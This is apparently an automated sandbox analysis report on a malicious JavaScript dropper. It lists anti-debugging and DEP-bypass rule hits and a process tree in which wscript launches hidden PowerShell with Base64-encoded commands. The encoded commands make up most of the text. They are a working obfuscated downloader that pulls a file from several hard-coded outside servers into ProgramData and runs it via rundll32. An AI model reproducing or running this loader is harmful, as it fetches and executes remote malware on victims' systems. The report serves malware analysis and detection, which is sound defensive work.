eQBhAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBRAEEAdgBBAEUAdwBBAFoAUQBCAHgAQQBDADgAQQBjAEEAQgAwAEEARQBNAEEAUQBnAEEAeABBAEUAawBBAFUAdwBCAFEAQQBHADAAQQBaAGcAQgBsAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcwBwAGUAaQBzAGUAIABpAG4AIAAkAHUAbgBkAGUAcgBjAGEAcgB2AGUAZAAgAC0AcwBwAGwAaQB0ACAAIgB5AGEARwAiACkAIAB7ACQAcwBlAG0AaQBqAHUAYgBpAGwAZQBlAEIAbABvAG8AZABzAHQAcgBlAGEAbQAgAD0AIAAzADQANwA7ACQAYQBkAGkAcABvAG0AZQB0AGUAcgBUAGgAbwBuAGQAcgBhAGMAaQBhAG4AcwAgAD0AIAAiAFUAbgBjAGgAYQByAGcAZQBhAGIAbABlAE0AdQBzAHMAaQBjAGsAIgA7ACQAbQBlAHIAeQBjAGkAcwBtAHUAcwBNAGkAYwByAG8AcwB1AHIAZwBlAHIAaQBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATgBnAEEAMwBBAEMANABBAE0AZwBBAHoAQQBEAFkAQQBMAGcAQQB4AEEARABNAEEATwBBAEEAPQBpAGkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAWgBRAEIAeQBBAEgAQQBBAGIAQQBCAHAAQQBHAE0AQQBZAFEAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEMANABBAFoAZwBCADEAQQBIAEkAQQBiAGcAQgBwAEEASABRAEEAZABRAEIAeQBBAEcAVQBBAGkAaQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABVAEEATQBRAEEAdQBBAEQAZwBBAE4AUQBBAHUAQQBEAEkAQQBNAEEAQQAwAEEAQQA9AD0AaQBpAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABrAEEATABnAEEAeABBAEQARQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQA1AEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAHQAcgBpAHMAbwBtAGUAQwBvAGwAZABuAGUAcwBzACAAPQAgACIAQgBlAGwAbABvAHcAaQBuAGcAIgA7ACQAQgBpAHQAdABlAGQASQBuAHQAZQBnAHIAYQB0AGkAbwBuACAAPQAgADkAOAA2ADsAJAByAHkAZQBnAHIAYQBzAHMAQQBtAGIAYQBzAHMAYQBkAG8AcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAHAAZQBpAHMAZQApACkAOwBpAHcAcgAgACQAcgB5AGUAZwByAGEAcwBzAEEAbQBiAGEAcwBzAGEAZABvAHIAIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABiAGkAcwB5AG4AYwAuAG0AYQBjAGsAaQBuAGIAbwB5ADsAJABNAG8AdABvAHIAbQBlAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAWQBRAEIAdABBAEcAawBBAFoAQQBCAGwAQQBDADQAQQBiAFEAQgBoAEEASABJAEEAYQB3AEIAbABBAEgAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBNAGcAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAbABBAEcAUQBBAGMAQQBCAHMAQQBHADgAQQBkAEEAQQB1AEEASABjAEEAYgB3AEIAeQBBAEcAcwBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEARwBzAEEAYgB3AEIAcwBBAEcAdwBBAGUAUQBBAHUAQQBHAFUAQQBaAEEAQgAxAEEARwBNAEEAWQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBBAD0APQAiADsAJABVAG4AbABlAHYAZQBsAGkAbgBnACAAPQAgADYAMgA3ADsAJABNAHUAdAB0AG8AbgBzAFUAbgBjAGwAZQBhAG4AcwBlAGQAIAA9ACAAIgBNAG8AcgBnAGEAeQBHAGkAbgBnAGUAbAB5ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHMAeQBuAGMALgBtAGEAYwBrAGkAbgBiAG8AeQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA4ADUANQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABNAEEAZQBRAEIAdQBBAEcATQBBAEwAZwBCAHQAQQBHAEUAQQBZAHcAQgByAEEARwBrAEEAYgBnAEIAaQBBAEcAOABBAGUAUQBBAHMAQQBIAEEAQQBjAGcAQgBwAEEARwA0AEEAZABBAEEANwBBAEUANABBAFoAUQBCADQAQQBIAFEAQQBTAGcAQgBUAEEAQQA9AD0AIgA7ACQARgB1AGQAZABsAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQATQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB1AEEARABJAEEATQBnAEEAMgBBAEEAPQA9AHoAZABoAGUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAWQBRAEIAMABBAEcAVQBBAGIAQQBCAHMAQQBHAGsAQQBkAEEAQgBsAEEASABNAEEAYQBRAEIAdABBAEcARQBBAGIAQQBCAFEAQQBHAGcAQQBaAFEAQgB1AEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAFkAUQBCAGkAQQBBAD0APQAiADsAJABCAHIAbwBnAHUAZQBkACAAPQAgACIAdQBuAGMAbwBuAHMAbwBsAGEAYgBsAHkATwBvAHAAaABvAHIAaQBkAGkAdQBtACIAOwAkAGkAbgBoAG8AbQBvAGcAZQBuAGUAbwB1AHMARABhAGYAZgBhAGQAbwB3AG4AZABpAGwAbABpAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgBqAEEARwBnAEEAYQBRAEIAdwBBAEUAVQBBAGIAUQBCAGkAQQBIAEkAQQBiAHcAQgAzAEEARwBRAEEATABnAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAYgBnAEIAdQBBAEgAVQBBAFkAZwBCAHAAQQBHAEUAQQBiAEEAQgBzAEEASABrAEEAUQB3AEIAaABBAEcATQBBAGEAQQBCAGwAQQBHADAAQQBhAFEAQgBqAEEAQwA0AEEAZABBAEIAdgBBAEcAcwBBAGUAUQBCAHYAQQBBAD0APQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBNAEEAZQBRAEIAegBBAEgAUQBBAGEAUQBCAHUAQQBIAFUAQQBjAGcAQgBwAEEARwBFAEEAVgBBAEIAaABBAEcAZwBBAFkAUQBCAHMAQQBHAGsAQQBMAGcAQgB0AEEARwA4AEEAYwBnAEIAMABBAEcAYwBBAFkAUQBCAG4AQQBHAFUAQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBnAEEAdQBBAEQASQBBAE0AdwBBADQAQQBDADQAQQBPAFEAQQAzAEEAQwA0AEEATQBRAEEAMgBBAEQAawBBACIAOwBiAHIAZQBhAGsAOwBOAGUAeAB0AEoAUwA7AH0ATgBlAHgAdABKAFMAOwB9ACAAYwBhAHQAYwBoACAAewAkAEoAbwB1AG4AYwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABZAEEATABnAEEAeABBAEQARQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQAxAEEAQQA9AD0AUgBiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AUQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABFAEEATgBBAEEAMgBBAEMANABBAE0AZwBBADEAQQBEAEUAQQAiADsAfQB9ACQAbQBvAGQAdQBsAGEAcgBpAHoAaQBuAGcAQwByAHUAbgBrAGwAZQAgAD0AIAAzADIANAA7AA==" |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
parent_process | wscript.exe | martian_process | wscript "C:\Users\test22\AppData\Local\Temp\Nzor.js" ParonymizationRearbitrated EcheletteProtodonatan | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Nzor.js" ParonymizationRearbitrated EcheletteProtodonatan | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABJAG4AYwBvAG0AcAByAGUAaABlAG4AcwBpAGIAbABlAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA0AEEAQwA0AEEATQBnAEEAMQBBAEQAUQBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABJAEEATQB3AEEAMQBBAEEAPQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE4AQQBBAHUAQQBEAEkAQQBNAHcAQQAzAEEAQwA0AEEATQBRAEEANABBAEQAQQBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAHQAQQBHAEkAQQBjAGcAQgBwAEEARwB3AEEAYgBBAEIAaABBAEcAVQBBAFUAQQBCAGgAQQBHAGsAQQBiAGcAQgAwAEEASABJAEEAWgBRAEIAegBBAEgATQBBAEwAZwBCAHMAQQBHAFUAQQBZAFEAQgB6AEEARwBVAEEAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAZABvAG4AbwByAHMAaABpAHAAUwB1AGIAcABhAHMAdABvAHIAIAA9ACAAIgBtAGEAYwBhAGQAYQBtAGkAdABlAEMAaABvAHIAaQBzAG8AIgA7ACQASgB1AGIAYQByAHQAYQBzAFUAbgBwAHIAaQBuAGMAaQBwAGwAZQBkAGwAeQAgAD0AIAAzADkAMAA7ACQAYQBuAHQAaQByAG8AbQBhAG4AdABpAGMAaQBzAG0ARwBpAGcAYQBuAHQAbwBjAHkAdABlACAAPQAgACIAYQB0AHIAbwBjAGgAYQBsAEcAbAB1AGMAYQB0AGUAIgA7ACQAdQBuAGQAZQByAGMAYQByAHYAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAMQBBAEYAQQBBAFEAdwBCAEcAQQBEAFUAQQBTAHcAQQB6AEEARgBJAEEAeQBhAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBRAEEAdgBBAEUAdwBBAFoAUQBCAHgAQQBDADgAQQBjAEEAQgAwAEEARQBNAEEAUQBnAEEAeABBAEUAawBBAFUAdwBCAFEAQQBHADAAQQBaAGcAQgBsAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcwBwAGUAaQBzAGUAIABpAG4AIAAkAHUAbgBkAGUAcgBjAGEAcgB2AGUAZAAgAC0AcwBwAGwAaQB0ACAAIgB5AGEARwAiACkAIAB7ACQAcwBlAG0AaQBqAHUAYgBpAGwAZQBlAEIAbABvAG8AZABzAHQAcgBlAGEAbQAgAD0AIAAzADQANwA7ACQAYQBkAGkAcABvAG0AZQB0AGUAcgBUAGgAbwBuAGQAcgBhAGMAaQBhAG4AcwAgAD0AIAAiAFUAbgBjAGgAYQByAGcAZQBhAGIAbABlAE0AdQBzAHMAaQBjAGsAIgA7ACQAbQBlAHIAeQBjAGkAcwBtAHUAcwBNAGkAYwByAG8AcwB1AHIAZwBlAHIAaQBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATgBnAEEAMwBBAEMANABBAE0AZwBBAHoAQQBEAFkAQQBMAGcAQQB4AEEARABNAEEATwBBAEEAPQBpAGkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAWgBRAEIAeQBBAEgAQQBBAGIAQQBCAHAAQQBHAE0AQQBZAFEAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEMANABBAFoAZwBCADEAQQBIAEkAQQBiAGcAQgBwAEEASABRAEEAZABRAEIAeQBBAEcAVQBBAGkAaQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABVAEEATQBRAEEAdQBBAEQAZwBBAE4AUQBBAHUAQQBEAEkAQQBNAEEAQQAwAEEAQQA9AD0AaQBpAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABrAEEATABnAEEAeABBAEQARQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQA1AEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAHQAcgBpAHMAbwBtAGUAQwBvAGwAZABuAGUAcwBzACAAPQAgACIAQgBlAGwAbABvAHcAaQBuAGcAIgA7ACQAQgBpAHQAdABlAGQASQBuAHQAZQBnAHIAYQB0AGkAbwBuACAAPQAgADkAOAA2ADsAJAByAHkAZQBnAHIAYQBzAHMAQQBtAGIAYQBzAHMAYQBkAG8AcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAHAAZQBpAHMAZQApACkAOwBpAHcAcgAgACQAcgB5AGUAZwByAGEAcwBzAEEAbQBiAGEAcwBzAGEAZABvAHIAIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABiAGkAcwB5AG4AYwAuAG0AYQBjAGsAaQBuAGIAbwB5ADsAJABNAG8AdABvAHIAbQBlAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAWQBRAEIAdABBAEcAawBBAFoAQQBCAGwAQQBDADQAQQBiAFEAQgBoAEEASABJAEEAYQB3AEIAbABBAEgAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBNAGcAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAbABBAEcAUQBBAGMAQQBCAHMAQQBHADgAQQBkAEEAQQB1AEEASABjAEEAYgB3AEIAeQBBAEcAcwBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEARwBzAEEAYgB3AEIAcwBBAEcAdwBBAGUAUQBBAHUAQQBHAFUAQQBaAEEAQgAxAEEARwBNAEEAWQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBBAD0APQAiADsAJABVAG4AbABlAHYAZQBsAGkAbgBnACAAPQAgADYAMgA3ADsAJABNAHUAdAB0AG8AbgBzAFUAbgBjAGwAZQBhAG4AcwBlAGQAIAA9ACAAIgBNAG8AcgBnAGEAeQBHAGkAbgBnAGUAbAB5ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHMAeQBuAGMALgBtAGEAYwBrAGkAbgBiAG8AeQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA4ADUANQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABNAEEAZQBRAEIAdQBBAEcATQBBAEwAZwBCAHQAQQBHAEUAQQBZAHcAQgByAEEARwBrAEEAYgBnAEIAaQBBAEcAOABBAGUAUQBBAHMAQQBIAEEAQQBjAGcAQgBwAEEARwA0AEEAZABBAEEANwBBAEUANABBAFoAUQBCADQAQQBIAFEAQQBTAGcAQgBUAEEAQQA9AD0AIgA7ACQARgB1AGQAZABsAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQATQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB1AEEARABJAEEATQBnAEEAMgBBAEEAPQA9AHoAZABoAGUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAWQBRAEIAMABBAEcAVQBBAGIAQQBCAHMAQQBHAGsAQQBkAEEAQgBsAEEASABNAEEAYQBRAEIAdABBAEcARQBBAGIAQQBCAFEAQQBHAGcAQQBaAFEAQgB1AEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAFkAUQBCAGkAQQBBAD0APQAiADsAJABCAHIAbwBnAHUAZQBkACAAPQAgACIAdQBuAGMAbwBuAHMAbwBsAGEAYgBsAHkATwBvAHAAaABvAHIAaQBkAGkAdQBtACIAOwAkAGkAbgBoAG8AbQBvAGcAZQBuAGUAbwB1AHMARABhAGYAZgBhAGQAbwB3AG4AZABpAGwAbABpAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgBqAEEARwBnAEEAYQBRAEIAdwBBAEUAVQBBAGIAUQBCAGkAQQBIAEkAQQBiAHcAQgAzAEEARwBRAEEATABnAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAYgBnAEIAdQBBAEgAVQBBAFkAZwBCAHAAQQBHAEUAQQBiAEEAQgBzAEEASABrAEEAUQB3AEIAaABBAEcATQBBAGEAQQBCAGwAQQBHADAAQQBhAFEAQgBqAEEAQwA0AEEAZABBAEIAdgBBAEcAcwBBAGUAUQBCAHYAQQBBAD0APQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBNAEEAZQBRAEIAegBBAEgAUQBBAGEAUQBCAHUAQQBIAFUAQQBjAGcAQgBwAEEARwBFAEEAVgBBAEIAaABBAEcAZwBBAFkAUQBCAHMAQQBHAGsAQQBMAGcAQgB0AEEARwA4AEEAYwBnAEIAMABBAEcAYwBBAFkAUQBCAG4AQQBHAFUAQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBnAEEAdQBBAEQASQBBAE0AdwBBADQAQQBDADQAQQBPAFEAQQAzAEEAQwA0AEEATQBRAEEAMgBBAEQAawBBACIAOwBiAHIAZQBhAGsAOwBOAGUAeAB0AEoAUwA7AH0ATgBlAHgAdABKAFMAOwB9ACAAYwBhAHQAYwBoACAAewAkAEoAbwB1AG4AYwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABZAEEATABnAEEAeABBAEQARQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQAxAEEAQQA9AD0AUgBiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AUQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABFAEEATgBBAEEAMgBBAEMANABBAE0AZwBBADEAQQBEAEUAQQAiADsAfQB9ACQAbQBvAGQAdQBsAGEAcgBpAHoAaQBuAGcAQwByAHUAbgBrAGwAZQAgAD0AIAAzADIANAA7AA==" | ||||||
parent_process | wscript.exe | martian_process | powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABJAG4AYwBvAG0AcAByAGUAaABlAG4AcwBpAGIAbABlAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA0AEEAQwA0AEEATQBnAEEAMQBBAEQAUQBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABJAEEATQB3AEEAMQBBAEEAPQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE4AQQBBAHUAQQBEAEkAQQBNAHcAQQAzAEEAQwA0AEEATQBRAEEANABBAEQAQQBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAHQAQQBHAEkAQQBjAGcAQgBwAEEARwB3AEEAYgBBAEIAaABBAEcAVQBBAFUAQQBCAGgAQQBHAGsAQQBiAGcAQgAwAEEASABJAEEAWgBRAEIAegBBAEgATQBBAEwAZwBCAHMAQQBHAFUAQQBZAFEAQgB6AEEARwBVAEEAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAZABvAG4AbwByAHMAaABpAHAAUwB1AGIAcABhAHMAdABvAHIAIAA9ACAAIgBtAGEAYwBhAGQAYQBtAGkAdABlAEMAaABvAHIAaQBzAG8AIgA7ACQASgB1AGIAYQByAHQAYQBzAFUAbgBwAHIAaQBuAGMAaQBwAGwAZQBkAGwAeQAgAD0AIAAzADkAMAA7ACQAYQBuAHQAaQByAG8AbQBhAG4AdABpAGMAaQBzAG0ARwBpAGcAYQBuAHQAbwBjAHkAdABlACAAPQAgACIAYQB0AHIAbwBjAGgAYQBsAEcAbAB1AGMAYQB0AGUAIgA7ACQAdQBuAGQAZQByAGMAYQByAHYAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAMQBBAEYAQQBBAFEAdwBCAEcAQQBEAFUAQQBTAHcAQQB6AEEARgBJAEEAeQBhAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBRAEEAdgBBAEUAdwBBAFoAUQBCAHgAQQBDADgAQQBjAEEAQgAwAEEARQBNAEEAUQBnAEEAeABBAEUAawBBAFUAdwBCAFEAQQBHADAAQQBaAGcAQgBsAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcwBwAGUAaQBzAGUAIABpAG4AIAAkAHUAbgBkAGUAcgBjAGEAcgB2AGUAZAAgAC0AcwBwAGwAaQB0ACAAIgB5AGEARwAiACkAIAB7ACQAcwBlAG0AaQBqAHUAYgBpAGwAZQBlAEIAbABvAG8AZABzAHQAcgBlAGEAbQAgAD0AIAAzADQANwA7ACQAYQBkAGkAcABvAG0AZQB0AGUAcgBUAGgAbwBuAGQAcgBhAGMAaQBhAG4AcwAgAD0AIAAiAFUAbgBjAGgAYQByAGcAZQBhAGIAbABlAE0AdQBzAHMAaQBjAGsAIgA7ACQAbQBlAHIAeQBjAGkAcwBtAHUAcwBNAGkAYwByAG8AcwB1AHIAZwBlAHIAaQBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATgBnAEEAMwBBAEMANABBAE0AZwBBAHoAQQBEAFkAQQBMAGcAQQB4AEEARABNAEEATwBBAEEAPQBpAGkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAWgBRAEIAeQBBAEgAQQBBAGIAQQBCAHAAQQBHAE0AQQBZAFEAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEMANABBAFoAZwBCADEAQQBIAEkAQQBiAGcAQgBwAEEASABRAEEAZABRAEIAeQBBAEcAVQBBAGkAaQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUA